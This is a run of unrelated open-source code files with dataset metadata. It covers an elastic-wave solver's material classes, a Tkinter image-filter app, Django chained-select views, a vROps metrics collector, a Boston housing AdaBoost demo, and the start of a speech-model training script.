'tau1', 'tau2', 'tau3', 'freq', 'phase',\n ]\n vdefaults = {\n 'bfcsys': 0.0,\n 'tau1': 0.0, 'tau2': 0.0, 'tau3': 0.0, 'freq': 0.0, 'phase': 0.0,\n }\n _ghostgeom_ = 'compress'\n def soln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_soln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n c_int(self.value.shape[1]),\n self.value.ctypes._as_parameter_,\n )\n def dsoln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_dsoln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n )\n\nclass ElaslinTractionFree(ElaslinBC):\n _ghostgeom_ = 'mirror'\n def soln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_free_soln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n )\n def dsoln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_free_dsoln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n )\n\nclass ElaslinTractionFree2(ElaslinBC):\n _ghostgeom_ = 'mirror'\n def soln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_free2_soln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n )\n def dsoln(self):\n from ctypes import byref, c_int\n self._clib_boundcond.bound_traction_free2_dsoln(\n byref(self.svr.exd),\n c_int(self.facn.shape[0]),\n self.facn.ctypes._as_parameter_,\n )\n\n################################################################################\n# Plane wave solution.\n################################################################################\n\nclass ElaslinPWSolution(PlaneWaveSolution):\n def _calc_eigen(self, **kw):\n from numpy import sqrt\n from numpy.linalg import eig\n wvec = kw['wvec']\n mtrl = kw['mtrl']\n idx = kw['idx']\n nml = wvec/sqrt((wvec**2).sum())\n jacos = mtrl.get_jacos()\n jaco = jacos[0] * nml[0]\n for idm in range(1, len(nml)):\n jaco += jacos[idm] * nml[idm]\n evl, evc = eig(jaco)\n srt = evl.argsort()\n evl = evl[srt[idx]].real\n evc = evc[:,srt[idx]].real\n evc *= evc[0]/abs(evc[0]+1.e-200)\n return evl, evc\n\n################################################################################\n# Anchor.\n################################################################################\n\nclass ElaslinOAnchor(Anchor):\n \"\"\"\n Calculate total energy, i.e., the summation of kinetic energy and strain\n energy.\n \"\"\"\n def _calculate_physics(self):\n from ctypes import byref\n from numpy import empty\n from numpy.linalg import inv\n svr = self.svr\n # input arrays.\n rhos = empty(svr.ngroup, dtype=svr.fpdtype)\n comps = empty((svr.ngroup, 6, 6), dtype=svr.fpdtype)\n for igp in range(svr.ngroup):\n mtrl = svr.mtrllist[igp]\n rhos[igp] = mtrl.rho\n comps[igp,:,:] = inv(mtrl.stiff).T\n # output arrays.\n svr._clib_elaslin.calc_energy(\n byref(svr.exd),\n rhos.ctypes._as_parameter_,\n comps.ctypes._as_parameter_,\n svr.der['energy'].ctypes._as_parameter_,\n )\n def provide(self):\n from numpy import empty\n svr = self.svr\n svr.der['energy'] = empty(svr.ngstcell+svr.ncell, dtype=svr.fpdtype)\n self._calculate_physics()\n def postfull(self):\n self._calculate_physics()\n\n################################################################################\n# Material definition.\n################################################################################\n\nmltregy = TypeNameRegistry() # registry singleton.\nclass 
MaterialMeta(type):\n \"\"\"\n Meta class for material class.\n \"\"\"\n def __new__(cls, name, bases, namespace):\n newcls = super(MaterialMeta, cls).__new__(cls, name, bases, namespace)\n # register.\n mltregy.register(newcls)\n return newcls\n\nclass Material(object):\n \"\"\"\n Material properties. The constitutive relation needs not be symmetric.\n \n @cvar _zeropoints_: list of tuples for indices where the content should be\n zero.\n @ctype _zeropoints_: list\n @ivar rho: density\n @ivar al: alpha angle.\n @ivar be: beta angle.\n @ivar ga: gamma angle.\n @ivar origstiff: stiffness matrix in the crystal coordinate.\n @ivar stiff: stiffness matrix in the transformed global coordinate.\n \"\"\"\n\n __metaclass__ = MaterialMeta\n\n _zeropoints_ = []\n\n from numpy import array\n K = array([ [\n [1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 1, 0],\n ], [\n [0, 0, 0, 0, 0, 1],\n [0, 1, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0],\n ], [\n [0, 0, 0, 0, 1, 0],\n [0, 0, 0, 1, 0, 0],\n [0, 0, 1, 0, 0, 0],\n ], ], dtype='float64')\n del array\n\n def __init__(self, *args, **kw):\n from numpy import empty, dot\n self.rho = kw.pop('rho')\n self.al = kw.pop('al')\n self.be = kw.pop('be')\n self.ga = kw.pop('ga')\n # set stiffness matrix.\n origstiff = empty((6,6), dtype='float64')\n origstiff.fill(0.0)\n for key in kw.keys(): # becaues I pop out the key.\n if len(key) == 4 and key[:2] == 'co':\n try:\n i = int(key[2])-1\n j = int(key[3])-1\n except:\n continue\n assert i < origstiff.shape[0]\n assert j < origstiff.shape[1]\n val = kw.pop(key)\n origstiff[i,j] = val\n self.origstiff = origstiff\n # check for zeros.\n self._check_origstiffzero(self.origstiff)\n # compute the stiffness matrix in the transformed global coordinate\n # system.\n bondmat = self.get_bondmat()\n self.stiff = dot(bondmat, dot(self.origstiff, bondmat.T))\n super(Material, self).__init__(*args, **kw)\n\n def __getattr__(self, key):\n if len(key) == 4 and key[:2] == 'co':\n i = int(key[2])\n j = int(key[3])\n if 1 <= i <= 6 and 1 <= j <= 6:\n return self.origstiff[i-1,j-1]\n elif len(key) == 3 and key[0] == 'c':\n i = int(key[1])\n j = int(key[2])\n if 1 <= i <= 6 and 1 <= j <= 6:\n return self.stiff[i-1,j-1]\n else:\n raise AttributeError\n\n def __str__(self):\n from math import pi\n return '[%s: al=%.2f be=%.2f ga=%.2f (deg)]' % (self.__class__.__name__,\n self.al/(pi/180), self.be/(pi/180), self.ga/(pi/180))\n\n @classmethod\n def _check_origstiffzero(cls, origstiff):\n \"\"\"\n Check for zero in original stiffness matrix.\n\n @note: no assumed symmetry.\n \"\"\"\n for i, j in cls._zeropoints_:\n assert origstiff[i,j] == 0.0\n\n def get_rotmat(self):\n \"\"\"\n Coordinate transformation matrix for three successive rotations through\n the Euler angles.\n\n @return: the transformation matrix.\n @rtype: numpy.ndarray\n \"\"\"\n from numpy import array, cos, sin, dot\n al = self.al; be = self.be; ga = self.ga\n almat = array([\n [cos(al), sin(al), 0],\n [-sin(al), cos(al), 0],\n [0, 0, 1],\n ], dtype='float64')\n bemat = array([\n [1, 0, 0],\n [0, cos(be), sin(be)],\n [0, -sin(be), cos(be)],\n ], dtype='float64')\n gamat = array([\n [cos(ga), sin(ga), 0],\n [-sin(ga), cos(ga), 0],\n [0, 0, 1],\n ], dtype='float64')\n return dot(gamat, dot(bemat, almat))\n\n def get_bondmat(self):\n \"\"\"\n The Bond's matrix M as a shorthand of coordinate transformation for the \n 6-component stress vector.\n\n @return: the Bond's matrix.\n @rtype: numpy.ndarray\n \"\"\"\n from numpy import empty\n rotmat = self.get_rotmat()\n bond = 
empty((6,6), dtype='float64')\n # upper left.\n bond[:3,:3] = rotmat[:,:]**2\n # upper right.\n bond[0,3] = 2*rotmat[0,1]*rotmat[0,2]\n bond[0,4] = 2*rotmat[0,2]*rotmat[0,0]\n bond[0,5] = 2*rotmat[0,0]*rotmat[0,1]\n bond[1,3] = 2*rotmat[1,1]*rotmat[1,2]\n bond[1,4] = 2*rotmat[1,2]*rotmat[1,0]\n bond[1,5] = 2*rotmat[1,0]*rotmat[1,1]\n bond[2,3] = 2*rotmat[2,1]*rotmat[2,2]\n bond[2,4] = 2*rotmat[2,2]*rotmat[2,0]\n bond[2,5] = 2*rotmat[2,0]*rotmat[2,1]\n # lower left.\n bond[3,0] = rotmat[1,0]*rotmat[2,0]\n bond[3,1] = rotmat[1,1]*rotmat[2,1]\n bond[3,2] = rotmat[1,2]*rotmat[2,2]\n bond[4,0] = rotmat[2,0]*rotmat[0,0]\n bond[4,1] = rotmat[2,1]*rotmat[0,1]\n bond[4,2] = rotmat[2,2]*rotmat[0,2]\n bond[5,0] = rotmat[0,0]*rotmat[1,0]\n bond[5,1] = rotmat[0,1]*rotmat[1,1]\n bond[5,2] = rotmat[0,2]*rotmat[1,2]\n # lower right.\n bond[3,3] = rotmat[1,1]*rotmat[2,2] + rotmat[1,2]*rotmat[2,1]\n bond[3,4] = rotmat[1,0]*rotmat[2,2] + rotmat[1,2]*rotmat[2,0]\n bond[3,5] = rotmat[1,1]*rotmat[2,0] + rotmat[1,0]*rotmat[2,1]\n bond[4,3] = rotmat[0,1]*rotmat[2,2] + rotmat[0,2]*rotmat[2,1]\n bond[4,4] = rotmat[0,0]*rotmat[2,2] + rotmat[0,2]*rotmat[2,0]\n bond[4,5] = rotmat[0,1]*rotmat[2,0] + rotmat[0,0]*rotmat[2,1]\n bond[5,3] = rotmat[0,1]*rotmat[1,2] + rotmat[0,2]*rotmat[1,1]\n bond[5,4] = rotmat[0,0]*rotmat[1,2] + rotmat[0,2]*rotmat[1,0]\n bond[5,5] = rotmat[0,1]*rotmat[1,0] + rotmat[0,0]*rotmat[1,1]\n return bond\n\n def get_jacos(self):\n \"\"\"\n Obtain the Jacobian matrices for the solid.\n\n @param K: the K matrix.\n @type K: numpy.ndarray\n @return: the Jacobian matrices\n @rtype: numpy.ndarray\n \"\"\"\n from numpy import zeros, dot\n rho = self.rho\n sf = self.stiff\n jacos = zeros((3,9,9), dtype='float64')\n for idm in range(3):\n K = self.K[idm]\n jaco = jacos[idm]\n jaco[:3,3:] = K/(-rho) # the upper right submatrix.\n jaco[3:,:3] = -dot(sf, K.T) # the lower left submatrix.\n return jacos\n\n################################################################################\n# Symmetry.\n################################################################################\n\nclass Triclinic(Material):\n \"\"\"\n The stiffness matrix has to be symmetric.\n \"\"\"\n _zeropoints_ = []\n def __init__(self, *args, **kw):\n for key in kw.keys(): # becaues I modify the key.\n if len(key) == 4 and key[:2] == 'co':\n try:\n i = int(key[2])\n j = int(key[3])\n except:\n continue\n symkey = 'co%d%d' % (j, i)\n if i != j:\n assert symkey not in kw\n kw[symkey] = kw[key]\n super(Triclinic, self).__init__(*args, **kw)\n @classmethod\n def _check_origstiffzero(cls, origstiff):\n for i, j in cls._zeropoints_:\n assert origstiff[i,j] == origstiff[j,i] == 0.0\n\nclass Monoclinic(Triclinic):\n _zeropoints_ = [\n (0,3), (0,5),\n (1,3), (1,5),\n (2,3), (2,5),\n (3,4), (4,5),\n ]\n\nclass Orthorhombic(Triclinic):\n _zeropoints_ = [\n (0,3), (0,4), (0,5),\n (1,3), (1,4), (1,5),\n (2,3), (2,4), (2,5),\n (3,4), (3,5), (4,5),\n ]\n\nclass Tetragonal(Triclinic):\n _zeropoints_ = [\n (0,3), (0,4),\n (1,3), (1,4),\n (2,3), (2,4), (2,5),\n (3,4), (3,5), (4,5),\n ]\n def __init__(self, *args, **kw):\n kw['co22'] = kw['co11']\n kw['co23'] = kw['co13']\n kw['co26'] = -kw.get('co16', 0.0)\n kw['co55'] = kw['co44']\n super(Tetragonal, self).__init__(*args, **kw)\n\nclass Trigonal(Triclinic):\n _zeropoints_ = [\n (0,5), (1,5),\n (2,3), (2,4), (2,5),\n (3,4),\n ]\n def __init__(self, *args, **kw):\n kw['co15'] = -kw.get('co25', 0.0)\n kw['co22'] = kw['co11']\n kw['co23'] = kw['co13']\n kw['co24'] = -kw.get('co14', 0.0)\n kw['co46'] = 
kw.get('co25', 0.0)\n kw['co55'] = kw['co44']\n kw['co56'] = kw.get('co14', 0.0)\n kw['co66'] = (kw['co11'] - kw['co12'])/2\n super(Trigonal, self).__init__(*args, **kw)\n\nclass Hexagonal(Trigonal):\n _zeropoints_ = [\n (0,3), (0,4), (0,5),\n (1,3), (1,4), (1,5),\n (2,3), (2,4), (2,5),\n (3,4), (3,5), (4,5),\n ]\n\nclass Cubic(Triclinic):\n _zeropoints_ = [\n (0,3), (0,4), (0,5),\n (1,3), (1,4), (1,5),\n (2,3), (2,4), (2,5),\n (3,4), (3,5), (4,5),\n ]\n def __init__(self, *args, **kw):\n kw['co13'] = kw['co12']\n kw['co22'] = kw['co11']\n kw['co23'] = kw['co12']\n kw['co33'] = kw['co11']\n kw['co55'] = kw['co44']\n kw['co66'] = kw['co44']\n super(Cubic, self).__init__(*args, **kw)\n\nclass Isotropic(Triclinic):\n _zeropoints_ = [\n (0,3), (0,4), (0,5),\n (1,3), (1,4), (1,5),\n (2,3), (2,4), (2,5),\n (3,4), (3,5), (4,5),\n ]\n def __init__(self, *args, **kw):\n kw['co12'] = kw['co11']-2*kw['co44']\n kw['co13'] = kw['co11']-2*kw['co44']\n kw['co22'] = kw['co11']\n kw['co23'] = kw['co11']-2*kw['co44']\n kw['co33'] = kw['co11']\n kw['co55'] = kw['co44']\n kw['co66'] = kw['co44']\n super(Isotropic, self).__init__(*args, **kw)\n\n################################################################################\n# Material properties.\n################################################################################\n\nclass GaAs(Cubic):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 5307.0)\n kw.setdefault('co11', 11.88e10)\n kw.setdefault('co12', 5.38e10)\n kw.setdefault('co44', 5.94e10)\n super(GaAs, self).__init__(*args, **kw)\n\nclass ZnO(Hexagonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 5680.0)\n kw.setdefault('co11', 20.97e10)\n kw.setdefault('co12', 12.11e10)\n kw.setdefault('co13', 10.51e10)\n kw.setdefault('co33', 21.09e10)\n kw.setdefault('co44', 4.247e10)\n super(ZnO, self).__init__(*args, **kw)\n\nclass CdS(Hexagonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 4820.0)\n kw.setdefault('co11', 9.07e10)\n kw.setdefault('co12', 5.81e10)\n kw.setdefault('co13', 5.1e10)\n kw.setdefault('co33', 9.38e10)\n kw.setdefault('co44', 1.504e10)\n super(CdS, self).__init__(*args, **kw)\n\nclass Zinc(Hexagonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 7.1*1.e-3/(1.e-2**3))\n kw.setdefault('co11', 14.3e11*1.e-5/(1.e-2**2))\n kw.setdefault('co12', 1.7e11*1.e-5/(1.e-2**2))\n kw.setdefault('co13', 3.3e11*1.e-5/(1.e-2**2))\n kw.setdefault('co33', 5.0e11*1.e-5/(1.e-2**2))\n kw.setdefault('co44', 4.0e11*1.e-5/(1.e-2**2))\n super(Zinc, self).__init__(*args, **kw)\n\nclass Beryl(Hexagonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 2.7*1.e-3/(1.e-2**3))\n kw.setdefault('co11', 26.94e11*1.e-5/(1.e-2**2))\n kw.setdefault('co12', 9.61e11*1.e-5/(1.e-2**2))\n kw.setdefault('co13', 6.61e11*1.e-5/(1.e-2**2))\n kw.setdefault('co33', 23.63e11*1.e-5/(1.e-2**2))\n kw.setdefault('co44', 6.53e11*1.e-5/(1.e-2**2))\n super(Beryl, self).__init__(*args, **kw)\n\nclass Albite(Triclinic):\n def __init__(self, *args, **kw):\n #kw.setdefault('rho', )\n kw.setdefault('co11', 69.9e9)\n kw.setdefault('co22', 183.5e9)\n kw.setdefault('co33', 179.5e9)\n kw.setdefault('co44', 24.9e9)\n kw.setdefault('co55', 26.8e9)\n kw.setdefault('co66', 33.5e9)\n kw.setdefault('co12', 34.0e9)\n kw.setdefault('co13', 30.8e9)\n kw.setdefault('co14', 5.1e9)\n kw.setdefault('co15', -2.4e9)\n kw.setdefault('co16', -0.9e9)\n kw.setdefault('co23', 5.5e9)\n kw.setdefault('co24', -3.9e9)\n kw.setdefault('co25', -7.7e9)\n kw.setdefault('co26', -5.8e9)\n kw.setdefault('co34', 
-8.7e9)\n kw.setdefault('co35', 7.1e9)\n kw.setdefault('co36', -9.8e9)\n kw.setdefault('co45', -2.4e9)\n kw.setdefault('co46', -7.2e9)\n kw.setdefault('co56', 0.5e9)\n super(Albite, self).__init__(*args, **kw)\n\nclass Acmite(Monoclinic):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 3.5e3)\n kw.setdefault('co11', 185.8e9)\n kw.setdefault('co22', 181.3e9)\n kw.setdefault('co33', 234.4e9)\n kw.setdefault('co44', 62.9e9)\n kw.setdefault('co55', 51.0e9)\n kw.setdefault('co66', 47.4e9)\n kw.setdefault('co12', 68.5e9)\n kw.setdefault('co13', 70.7e9)\n kw.setdefault('co15', 9.8e9)\n kw.setdefault('co23', 62.9e9)\n kw.setdefault('co25', 9.4e9)\n kw.setdefault('co35', 21.4e9)\n kw.setdefault('co46', 7.7e9)\n super(Acmite, self).__init__(*args, **kw)\n\nclass AlphaUranium(Orthorhombic):\n def __init__(self, *args, **kw):\n #kw.setdefault('rho', )\n kw.setdefault('rho', 8.2e3) # a false value.\n kw.setdefault('co11', 215.e9)\n kw.setdefault('co22', 199.e9)\n kw.setdefault('co33', 267.e9)\n kw.setdefault('co44', 124.e9)\n kw.setdefault('co55', 73.e9)\n kw.setdefault('co66', 74.e9)\n kw.setdefault('co12', 46.e9)\n kw.setdefault('co13', 22.e9)\n kw.setdefault('co23', 107.e9)\n super(AlphaUranium, self).__init__(*args, **kw)\n\nclass BariumTitanate(Tetragonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 6.2e3)\n kw.setdefault('co11', 275.0e9)\n kw.setdefault('co33', 165.0e9)\n kw.setdefault('co44', 54.3e9)\n kw.setdefault('co66', 113.0e9)\n kw.setdefault('co12', 179.0e9)\n kw.setdefault('co13', 151.0e9)\n super(BariumTitanate, self).__init__(*args, **kw)\n\nclass AlphaQuartz(Trigonal):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 2.651e3)\n kw.setdefault('co11', 87.6e9)\n kw.setdefault('co33', 106.8e9)\n kw.setdefault('co44', 57.2e9)\n kw.setdefault('co12', 6.1e9)\n kw.setdefault('co13', 13.3e9)\n kw.setdefault('co14', 17.3e9)\n super(AlphaQuartz, self).__init__(*args, **kw)\n\nclass RickerSample(Isotropic):\n def __init__(self, *args, **kw):\n kw.setdefault('rho', 2200.e0)\n kw.setdefault('co11', 3200.e0**2*2200.e0)\n kw.setdefault('co44', 1847.5e0**2*2200.e0)\n super(RickerSample, self).__init__(*args, **kw)\nclass RickerSampleLight(Isotropic):\n def __init__(self, *args, **kw):\n scale = 1.e-3\n kw.setdefault('rho', 2200.e0*scale)\n kw.setdefault('co11', 3200.e0**2*2200.e0*scale)\n kw.setdefault('co44', 1847.5e0**2*2200.e0*scale)\n super(RickerSampleLight, self).__init__(*args, **kw)\n","sub_path":"solvcon/kerpak/elaslin.py","file_name":"elaslin.py","file_ext":"py","file_size_in_byte":23973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"407421956","text":"from tkinter import *\r\nfrom PIL import ImageTk, Image\r\nfrom tkinter import filedialog\r\nfrom tkinter.ttk import *\r\nimport cv2\r\nfrom time import strftime\r\nimport tkinter.font\r\n\r\n\r\ndef open_imgC():\r\n \r\n x = openfilename()\r\n img = cv2.imread(x);\r\n img=cv2.resize(img,(500,500))\r\n numDownsamples=2\r\n numBilateralFilter=50\r\n img_color=img\r\n for i in range(numDownsamples):\r\n img_color=cv2.pyrDown(img_color)\r\n for i in range(numBilateralFilter):\r\n img_color = cv2.bilateralFilter(img_color, 9, 9, 7)\r\n for i in range(numDownsamples):\r\n img_color = cv2.pyrUp(img_color)\r\n\r\n\r\n\t\r\n img_gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\r\n img_blur = cv2.medianBlur(img_gray, 3)\t\r\n img_edge = cv2.adaptiveThreshold(img_blur, 255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY, 5, 2)\r\n (x,y,z) = img_color.shape\r\n img_edge 
= cv2.resize(img_edge,(y,x))\r\n    img_edge = cv2.cvtColor(img_edge, cv2.COLOR_GRAY2RGB)\r\n    cv2.imwrite(\"edge.png\",img_edge)\r\n    cimage=cv2.bitwise_and(img_color, img_edge)\r\n    cimage = cv2.copyMakeBorder(cimage, 10, 10, 10, 10, cv2.BORDER_CONSTANT)\r\n    cv2.imshow('Cartoonized image',cimage)\r\n    cv2.waitKey(0)\r\n\r\n\r\n\r\n    \r\ndef Blur_image():\r\n    x = openfilename()\r\n    image=cv2.imread(x)\r\n    Gaussian = cv2.blur(image, (9, 9))\r\n    image = cv2.copyMakeBorder(Gaussian, 10, 10, 10, 10, cv2.BORDER_CONSTANT)\r\n    cv2.imshow('Gaussian Blurring', image)\r\n    cv2.waitKey(0)\r\ndef open_imgD():\r\n    x = openfilename()\r\n    img = Image.open(x)\r\n    img = img.resize((500, 500), Image.ANTIALIAS)\r\n    img = ImageTk.PhotoImage(img)\r\n    panel=Label(root, image = img)\r\n    panel.image = img\r\n    panel.grid(row = 2)\r\ndef Grayscale():\r\n    x = openfilename()\r\n    img =cv2.imread(x)\r\n    gray_image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n    image = cv2.copyMakeBorder(gray_image, 10, 10, 10, 10, cv2.BORDER_CONSTANT)\r\n    cv2.imshow('Grayscale', image)\r\n    cv2.waitKey(0) \r\n    cv2.destroyAllWindows()\r\ndef openfilename():\r\n    filename = filedialog.askopenfilename(title ='Open')\r\n    return filename\r\ndef quit():\r\n    global root\r\n    root.destroy()\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"Filters\")\r\nroot.geometry('1500x1500')\r\nroot.configure(background='yellow')\r\nroot.resizable(width = True, height = True)\r\n\r\nstyle = Style()\r\nstyle.configure('TButton',font =('italic',15,'bold'),background='black',foreground = 'black',width=35,height=10)\r\n\r\nbtn1= Button(root,text ='Cartoonify ',style='TButton' ,command = open_imgC).grid(padx=500,pady=50)\r\nbtn2= Button(root,text ='Blur ', style='TButton' ,command = Blur_image).grid (padx=500,pady=50)\r\nbtn3= Button(root,text ='GrayScale ',style='TButton' , command = Grayscale).grid (padx=500,pady=50)\r\nbtn4= Button(root,text ='Quit',style='TButton' , command = quit).grid (padx=500,pady=50)\r\n\r\n\r\nroot.mainloop()\r\n","sub_path":"ecom/filterspython.py","file_name":"filterspython.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"291325617","text":"from django.apps import apps\nget_model = apps.get_model\nfrom django.http import HttpResponse\nimport json\nimport uuid\n\nfrom smart_selects.utils import (get_keywords, sort_results, serialize_results,\n                                 get_queryset)\n\n\nclass UUIDEncoder(json.JSONEncoder):\n    def default(self, obj):\n        if isinstance(obj, uuid.UUID):\n            return str(obj)\n        else:\n            return json.JSONEncoder.default(self, obj)\n\n\ndef filterchain(request, app, model, field, value, manager=None):\n    model_class = get_model(app, model)\n    keywords = get_keywords(field, value)\n    queryset = get_queryset(model_class, manager)\n\n    results = queryset.filter(**keywords)\n\n    # Sort results if model doesn't include a default ordering.\n    if not getattr(model_class._meta, 'ordering', False):\n        results = list(results)\n        sort_results(results)\n\n    serialized_results = serialize_results(results)\n    results_json = json.dumps(serialized_results, cls=UUIDEncoder)\n    return HttpResponse(results_json, content_type='application/json')\n\n\n
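# Illustrative aside: the UUIDEncoder above is what lets models with UUID primary keys serialize cleanly, e.g.\n# json.dumps({'value': uuid.uuid4()}, cls=UUIDEncoder) -> '{\"value\": \"f47ac10b-...\"}'\n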
def filterchain_all(request, app, model, field, value):\n    \"\"\"Returns filtered results followed by excluded results below.\"\"\"\n\n    model_class = get_model(app, model)\n    keywords = get_keywords(field, value)\n    queryset = get_queryset(model_class)\n\n    filtered = list(queryset.filter(**keywords))\n    sort_results(filtered)\n\n    excluded = list(queryset.exclude(**keywords))\n    sort_results(excluded)\n\n    # Empty choice to separate filtered and excluded results.\n    empty_choice = {'value': \"\", 'display': \"---------\"}\n\n    serialized_results = (\n        serialize_results(filtered) +\n        [empty_choice] +\n        serialize_results(excluded)\n    )\n\n    results_json = json.dumps(serialized_results, cls=UUIDEncoder)\n    return HttpResponse(results_json, content_type='application/json')\n","sub_path":"smart_selects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"133377058","text":"from BaseCollector import BaseCollector\nfrom tools.Vrops import Vrops\nimport logging\n\nlogger = logging.getLogger('vrops-exporter')\n\n\nclass ClusterStatsCollector(BaseCollector):\n\n    def __init__(self):\n        super().__init__()\n        self.vrops_entity_name = 'cluster'\n        self.wait_for_inventory_data()\n        self.name = self.__class__.__name__\n\n    def collect(self):\n        logger.info(f'{self.name} starts with collecting the metrics')\n\n        token = self.get_target_tokens()\n        token = token.setdefault(self.target, None)\n\n        if not token:\n            logger.warning(f'skipping {self.target} in {self.name}, no token')\n            return\n\n        gauges = self.generate_gauges('stats', self.name, self.vrops_entity_name,\n                                      ['vcenter', 'vccluster', 'datacenter'])\n        if not gauges:\n            return\n\n        uuids = self.get_clusters_by_target()\n        for metric_suffix in gauges:\n            statkey = gauges[metric_suffix]['statkey']\n            values = Vrops.get_latest_stat_multiple(self.target, token, uuids, statkey, self.name)\n            if not values:\n                logger.warning(f'Skipping statkey: {statkey} in {self.name}, no return')\n                continue\n\n            for value_entry in values:\n                metric_value = value_entry['stat-list']['stat'][0]['data']\n                if metric_value:\n                    metric_value = metric_value[0]\n                    cluster_id = value_entry['resourceId']\n                    gauges[metric_suffix]['gauge'].add_metric(\n                        labels=[self.clusters[cluster_id]['vcenter'],\n                                self.clusters[cluster_id]['name'],\n                                self.clusters[cluster_id]['parent_dc_name'].lower()],\n                        value=metric_value)\n\n        for metric_suffix in gauges:\n            yield gauges[metric_suffix]['gauge']\n","sub_path":"collectors/ClusterStatsCollector.py","file_name":"ClusterStatsCollector.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"438387824","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\"\"\"\r\ndemo07_boston.py  Boston house price prediction\r\n\"\"\"\r\nimport sklearn.datasets as sd\r\nimport sklearn.utils as su\r\nimport sklearn.tree as st\r\nimport sklearn.metrics as sm\r\n\r\n# Load Boston-area house prices\r\nboston = sd.load_boston()\r\n# ['crime rate' 'residential land ratio' 'commercial land ratio' \r\n# 'borders the river' 'air quality' 'number of rooms' 'age' \r\n# 'distance to city center' 'road network density' 'property tax' \r\n# 'pupil-teacher ratio' 'proportion of Black residents' 'lower-status population ratio']\r\n\r\nprint(boston.feature_names) # feature names\r\nprint(boston.data.shape) # model inputs\r\nprint(boston.target.shape) # model outputs\r\n\r\n# Split into training and test sets; 80% is used for training.\r\n# random_state: shuffling with the same random seed\r\n# always produces the same result.\r\nx, y = su.shuffle(boston.data, \r\n    boston.target, random_state=7)\r\ntrain_size = int(len(x) * 0.8)\r\ntrain_x, test_x, train_y, test_y = \\\r\n    x[:train_size], x[train_size:], \\\r\n    y[:train_size], y[train_size:]\r\nprint(train_x.shape)\r\nprint(test_x.shape)\r\n\r\n# Build a decision tree model -> train it -> test it\r\nmodel = st.DecisionTreeRegressor(max_depth=4)\r\nmodel.fit(train_x, train_y)\r\npred_test_y = model.predict(test_x)\r\nprint(sm.r2_score(test_y, pred_test_y))\r\n\r\n# Predict house prices with a boosting (AdaBoost) model\r\nimport sklearn.ensemble as 
se\r\n\r\nmodel = se.AdaBoostRegressor(model, \r\n n_estimators=400, random_state=7)\r\nmodel.fit(train_x, train_y)\r\npred_test_y = model.predict(test_x)\r\nprint(sm.r2_score(test_y, pred_test_y))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"aid1901/day2/demo08_adaboost.py","file_name":"demo08_adaboost.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"64803778","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Train the model (TIMIT corpus).\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\nfrom setproctitle import setproctitle\nimport argparse\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\nimport copy\n\nimport torch\ntorch.manual_seed(1623)\ntorch.cuda.manual_seed_all(1623)\n\nsys.path.append(os.path.abspath('../../../'))\nfrom models.load_model import load\nfrom examples.timit.s5.exp.dataset.load_dataset import Dataset\nfrom examples.timit.s5.exp.metrics.phone import eval_phone\nfrom utils.training.learning_rate_controller import Controller\nfrom utils.training.plot import plot_loss\nfrom utils.training.training_loop import train_step\nfrom utils.training.logging import set_logger\nfrom utils.directory import mkdir_join\nfrom utils.config import load_config, save_config\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--gpu', type=int, default=-1,\n help='the index of GPU (negative value indicates CPU)')\nparser.add_argument('--config_path', type=str, default=None,\n help='path to the configuration file')\nparser.add_argument('--data_save_path', type=str,\n help='path to saved data')\nparser.add_argument('--model_save_path', type=str, default=None,\n help='path to save the model')\nparser.add_argument('--saved_model_path', type=str, default=None,\n help='path to the saved model to retrain')\n\nMAX_DECODE_LEN_PHONE = 71\n\n\ndef main():\n\n args = parser.parse_args()\n\n ##################################################\n # DATSET\n ##################################################\n if args.model_save_path is not None:\n # Load a config file (.yml)\n params = load_config(args.config_path)\n # NOTE: Retrain the saved model from the last checkpoint\n elif args.saved_model_path is not None:\n params = load_config(os.path.join(args.saved_model_path, 